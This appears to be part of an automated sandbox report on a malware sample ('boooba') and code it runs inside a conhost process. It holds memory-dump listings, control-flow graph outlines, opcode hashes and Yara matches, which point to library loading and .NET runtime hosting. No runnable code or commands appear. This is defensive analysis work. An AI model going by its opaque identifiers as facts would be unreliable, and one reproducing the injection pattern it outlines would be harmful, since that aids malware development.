                                                                  • k$40=(3s))q96e/n7_m:f6,6=q!l6jun, xrefs: 00401098
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: k$40=(3s))q96e/n7_m:f6,6=q!l6jun
                                                                  • API String ID: 0-4154810256
                                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                  • Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
                                                                  • Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                  • Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344

                                                                  Control-flow Graph

                                                                  Control-flow graph of Function_0040224F (flattened from the rendered figure): a single block 0x40224f-0x4022ca calling 0x402158, 0x4010c4 and 0x4021ec.
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID:
                                                                  • API String ID: 4041149307-0
                                                                  • Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                  • Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
                                                                  • Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                  • Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                  • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                                  • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                  • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                  • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                                  • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                  • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                  • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                                  • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                  • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                  • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                                  • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                  • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                  • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                                  • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                  • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54

                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:42.9%
                                                                  Total number of Nodes:21
                                                                  Total number of Limit Nodes:2
                                                                  Execution graph (flattened from the rendered figure): entry 0x1575946e106 -> 0x1575946e128, which loops through LoadLibraryA (0x1575946e254) and falls through to 0x1575946e269. From there one branch goes to 0x1575946d2a2 -> LoadLibraryA (0x1575946d2af) -> 0x1575946d2c7 -> 0x1575946e2f3 -> 0x1575946e2f7, optionally through a further LoadLibraryA at 0x1575946d3ba -> 0x1575946d3df -> 0x1575946e30c; the other reaches 0x1575946e31d -> 0x1575946deb2 -> CLRCreateInstance (0x1575946def2) -> 0x1575946df0b -> SafeArrayDestroy (0x1575946e0a9) -> 0x1575946e0b2. All paths return to 0x1575946e17c. A second, unconnected LoadLibraryA stub (0x1575946d2af -> 0x1575946d2c7) is also listed.

                                                                  Control-flow Graph

                                                                  Control-flow graph of the function at 0x1575946e106 (flattened from the rendered figure; blocks span 0x1575946e106-0x1575946e4cf): calls 0x1575946f2de (three times at entry, again at 0x1575946e206 and 0x1575946e275), 0x1575946f85e, 0x1575946f87e, 0x1575946f492, 0x1575946f352, 0x1575946d4d2, 0x1575946d2a2, 0x1575946d3ba, 0x1575946deb2, 0x1575946e90e, 0x1575946d952, 0x1575946e4d6, 0x1575946ed6a and 0x1575946f5e2; LoadLibraryA is invoked in block 0x1575946e254-0x1575946e267.
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction ID: 74983336d2c02bc076b6f7e11c3207458aaf3810f85eaa7fc7990a1490f33266
                                                                  • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction Fuzzy Hash: C7C1C6B0328D45DBE76ADA68DC867EB73D1FBC5302F544169D44ACB1C6EB20EC52CA81

Control-flow Graph

[Control-flow graph: function at 7ffd9b8a5106; calls 7ffd9b8a55c4]
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd

Control-flow Graph

[Control-flow graph: function at 7ffd9b8a5eb2; calls 7ffd9b8a6340]
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd

Control-flow Graph

[Control-flow graph: function at 1575946e4d6; no API calls resolved]
Memory Dump Source
• Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
Yara matches

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
Similarity
• API ID:
• String ID: (7<k$07<k$87<k$87<k
• API String ID: 0-3253434258

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
Similarity
• API ID:
• String ID: 6<kW$@7<k$H7<k$6<k
• API String ID: 0-704970944

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
Similarity
• API ID:
• String ID: (7<k$07<k$87<k
• API String ID: 0-1414331572

Control-flow Graph

[Control-flow graph: function at 1575946deb2; calls CLRCreateInstance and SafeArrayDestroy]
APIs
Memory Dump Source
• Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
Yara matches
Similarity
• API ID: ArrayCreateDestroyInstanceSafe
• String ID:
• API String ID: 3902440814-0

Control-flow Graph

[Control-flow graph: function at 1575946d3ba; calls LoadLibraryA and 1575946f85e]
APIs
Memory Dump Source
• Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

[Control-flow graph: function at 1575946d2af; calls LoadLibraryA and 1575946f85e]
APIs
Memory Dump Source
• Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

[Control-flow graph: function at 1575946d2a2; calls LoadLibraryA and 1575946f85e]
APIs
Memory Dump Source
• Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph

[Control-flow graph: function at 7ffd9b8a01d3; no API calls resolved]
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd

Control-flow Graph

[Control-flow graph: function at 7ffd9b8a02f0; no API calls resolved]
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd

Control-flow Graph

[Control-flow graph: function at 7ffd9b8a109a; calls 7ffd9b8a0120]
Memory Dump Source
• Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd

                                                                  Control-flow Graph

                                                                  control_flow_graph 593 7ffd9b8a03f3-7ffd9b8a0411 598 7ffd9b8a03e9-7ffd9b8a03f1 593->598 599 7ffd9b8a0413-7ffd9b8a0428 593->599 598->599 605 7ffd9b8a0487-7ffd9b8a04b0 599->605 606 7ffd9b8a042a-7ffd9b8a0486 599->606 609 7ffd9b8a04ba-7ffd9b8a04d8 605->609 606->605
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd59179c0e7df223beb1827dbab353c0d8ac5b498318f646fa7e6d07dc00b36c
                                                                  • Instruction ID: 47062b3439741998e01bb08af16af2eb094aeac8ef8c25530dd2415ce6755da5
                                                                  • Opcode Fuzzy Hash: bd59179c0e7df223beb1827dbab353c0d8ac5b498318f646fa7e6d07dc00b36c
                                                                  • Instruction Fuzzy Hash: 6C31192161F6CA5FE7219B7488745AA7FA0FF46614F0900BBC0D88A097C91C690AC366
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21847dde42a783dc37a0d0176100fd893d422ed5ebaab33f468ccca2f39c6528
                                                                  • Instruction ID: 8128153aff487832bfc42de5163bfecb4cd1c62d1e4235a234ebe5d8a9762e7c
                                                                  • Opcode Fuzzy Hash: 21847dde42a783dc37a0d0176100fd893d422ed5ebaab33f468ccca2f39c6528
                                                                  • Instruction Fuzzy Hash: A921B630B196494FD759ABB4C865BAE76E1EF4A304F1104BDD00EDB2E7CE2D5881C792
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cccaacb56187f6aebb301ff28e20be503e20b4cb0eed72f50dc7441136df53d
                                                                  • Instruction ID: a81083a06f94125f9cbae351b7c0e20264a029475cb1dd079b826b3f6fd4e07d
                                                                  • Opcode Fuzzy Hash: 9cccaacb56187f6aebb301ff28e20be503e20b4cb0eed72f50dc7441136df53d
                                                                  • Instruction Fuzzy Hash: 13219530B196494FE749ABB48466BAE76E1EF49304F1104BDD00EDB2E7CE2D5841C792
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 244f000b7c289c4ea147c519378b00ed2578d558119caa3d1eddd14a98156cfa
                                                                  • Instruction ID: d0b39066cd16e68a6bcf3efbbe0282ea5d2c38ea5ea8daee753fc8781c4d38d3
                                                                  • Opcode Fuzzy Hash: 244f000b7c289c4ea147c519378b00ed2578d558119caa3d1eddd14a98156cfa
                                                                  • Instruction Fuzzy Hash: 75117B21E1D9CD0FEB4AAB7894A6BE67B90EF56310F0441F6D45DC71CFDE28A80583A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 883aa52eb40b9a4917309818c79cd3d30a31805e8d5a26546531072355ef98fb
                                                                  • Instruction ID: e22f27103954c9da442241bb5ae05a2bed16da09870e8e047995342b0b1d1864
                                                                  • Opcode Fuzzy Hash: 883aa52eb40b9a4917309818c79cd3d30a31805e8d5a26546531072355ef98fb
                                                                  • Instruction Fuzzy Hash: F6012B31B19D8D4AEF89AF6890A1BFA77A0EF98304F0045B6D41DC71CFDE29A8058391
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58945e3dac9c185330386e6333afbc2923d9b13c63996b17cb12153a23bffb86
                                                                  • Instruction ID: 7c04d1976ebcd9349e6224518d5cd43dd381a5983ae44c21245feb3703287d13
                                                                  • Opcode Fuzzy Hash: 58945e3dac9c185330386e6333afbc2923d9b13c63996b17cb12153a23bffb86
                                                                  • Instruction Fuzzy Hash: CC019230A19A5D4FD749EFB888665EEB7E1EF49704B1100BED40ACB2D6CE396D42C742
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6ff951bf2ee647c9dfa907628e7d196aea54593042ed8dd69d28f52978072fc
                                                                  • Instruction ID: 2fa91484418e93a2723c322c362d06a18e913596927852e86d9a52d672022d67
                                                                  • Opcode Fuzzy Hash: c6ff951bf2ee647c9dfa907628e7d196aea54593042ed8dd69d28f52978072fc
                                                                  • Instruction Fuzzy Hash: CB015E70E1A90E8FDBA4EFA88465AAC77E1EF59705F11007DD00ED72A6CE39AC41CB11
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7532e7fc04cd8121ceb105e7a97a304204d001a12171295a503ef1b5e6994765
                                                                  • Instruction ID: d038b993f14b8fd421c27f40befa26da6320c9b62161cd54a3ff93a36046f4a2
                                                                  • Opcode Fuzzy Hash: 7532e7fc04cd8121ceb105e7a97a304204d001a12171295a503ef1b5e6994765
                                                                  • Instruction Fuzzy Hash: 22F0E920B1A71A3FD351EFF88CE99AE25C6CFC716474100BDD449C72E9DE1C9C054216
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1727463833.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23e576ce6903603048644502fff64630c6c2d5043aa51752734cf0c386613865
                                                                  • Instruction ID: c9f24aab1d59aa9ac3e95178f86570badccfd54be8ddfcccda888b199f879cf4
                                                                  • Opcode Fuzzy Hash: 23e576ce6903603048644502fff64630c6c2d5043aa51752734cf0c386613865
                                                                  • Instruction Fuzzy Hash: ADE08021F2CC1D0F9794FB3C5495EA562D2EBDC31075545B6E40CC729AED24DC518781
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                                  • Instruction ID: 5cbe64ee918b41c3a6de789f10cd1cb40c1540abda8fa7868f971b1a80f28dc6
                                                                  • Opcode Fuzzy Hash: aead6af51b41200c7faad30d12abe602ed119050d19f46eacd4953986aecc5ac
                                                                  • Instruction Fuzzy Hash: 78E181B0628E458BDB69DF58D8867EB73D1FB95311F148229D88BCB1C1EB34EC16C681
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                                  • Instruction ID: 998024c9cd3316be01db4a637c03f2bad2f7aafeaae9a34a63b5da075429e336
                                                                  • Opcode Fuzzy Hash: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                                                  • Instruction Fuzzy Hash: 5FA12F71518A4C8FDB55EF28C889BEA77E9FBA8315F10466EE44BC7160EB30DA45CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000015759250000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_15759250000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                                  • Instruction ID: ffe9fe850661f7838bd0586d6ceb43bd97c648ddcf2cff22d0de4d32d36b70ed
                                                                  • Opcode Fuzzy Hash: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                                                  • Instruction Fuzzy Hash: 328165B0618B498BDB59DF24DC957EAB7D4FB99301F00462DD49AC6181EF30E945CAC2

                                                                  Execution Graph

                                                                  Execution Coverage:29.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:15
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 291 4023f2 _controlfp 292 4010c4 2 API calls 291->292 293 402473 292->293 277 4022fa 278 40232c 277->278 281 40224f 278->281 280 4023e5 282 402285 281->282 285 4010c4 282->285 284 4022be 284->280 286 402480 285->286 287 4010e7 memset 286->287 288 40115b 287->288 289 401214 sprintf 288->289 290 4012bd 289->290 290->284

                                                                  Callgraph

